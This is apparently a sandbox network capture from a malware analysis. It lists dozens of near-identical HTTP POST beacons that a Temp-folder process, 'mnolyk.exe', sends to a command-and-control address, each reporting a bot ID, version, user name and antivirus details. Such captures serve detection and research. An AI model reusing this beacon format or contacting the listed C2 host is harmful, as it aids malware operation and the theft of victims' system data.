                                                        Feb 6, 2023 14:17:29.900589943 CET | 361 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        16 | 192.168.2.5 | 49706 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:32.563263893 CET | 216 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.627523899 CET | 217 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        160 | 192.168.2.5 | 49850 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:30.084700108 CET | 361 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.150609970 CET | 362 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        161 | 192.168.2.5 | 49851 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:30.340440035 CET | 362 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.406188965 CET | 363 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        162 | 192.168.2.5 | 49852 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:30.586453915 CET | 363 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.649900913 CET | 364 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        163 | 192.168.2.5 | 49853 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:30.867273092 CET | 364 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.931150913 CET | 365 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        164 | 192.168.2.5 | 49854 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:31.105330944 CET | 365 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.170226097 CET | 366 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        165 | 192.168.2.5 | 49855 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:31.349236965 CET | 366 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.414278984 CET | 367 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        166 | 192.168.2.5 | 49856 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:31.586278915 CET | 367 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.649513006 CET | 368 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        167 | 192.168.2.5 | 49857 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:31.816085100 CET | 368 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.880172968 CET | 369 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        168 | 192.168.2.5 | 49858 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:32.692574978 CET | 369 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:32.758615971 CET | 370 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        169 | 192.168.2.5 | 49859 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:33.007738113 CET | 370 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:33.074064016 CET | 371 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        17 | 192.168.2.5 | 49707 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:32.799134016 CET | 217 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.866416931 CET | 218 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        170 | 192.168.2.5 | 49860 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:33.773507118 CET | 371 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:33.837563038 CET | 372 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        171 | 192.168.2.5 | 49861 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:34.059958935 CET | 372 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:34.124953985 CET | 373 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        172 | 192.168.2.5 | 49862 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:34.385168076 CET | 373 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:34.449311972 CET | 374 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        173 | 192.168.2.5 | 49863 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:35.672249079 CET | 374 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:35.737863064 CET | 375 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        174 | 192.168.2.5 | 49864 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:35.997425079 CET | 375 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.062361956 CET | 376 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        175 | 192.168.2.5 | 49865 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:36.266769886 CET | 376 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.329330921 CET | 377 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        176 | 192.168.2.5 | 49866 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:36.501144886 CET | 377 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.565888882 CET | 378 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


